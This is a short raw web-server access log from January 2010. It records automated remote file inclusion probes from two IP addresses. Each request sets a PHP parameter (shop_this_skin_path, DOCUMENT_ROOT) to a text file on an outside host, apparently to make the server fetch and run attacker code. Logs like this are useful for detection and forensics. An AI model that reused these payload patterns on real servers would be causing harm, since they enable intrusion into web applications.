91.142.214.201 - - [04/Jan/2010:00:56:00 -0500] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westchesterinvisalign.com/icon/baner.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:56:41 -0500] "GET /?DOCUMENT_ROOT=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:56:41 -0500] "GET /logs/access_log.Q109072900%20%20/?DOCUMENT_ROOT=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:56:41 -0500] "GET /logs/?DOCUMENT_ROOT=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 32774 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:56:42 -0500] "GET /logs/access_log.Q109090900%20%20/?DOCUMENT_ROOT=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
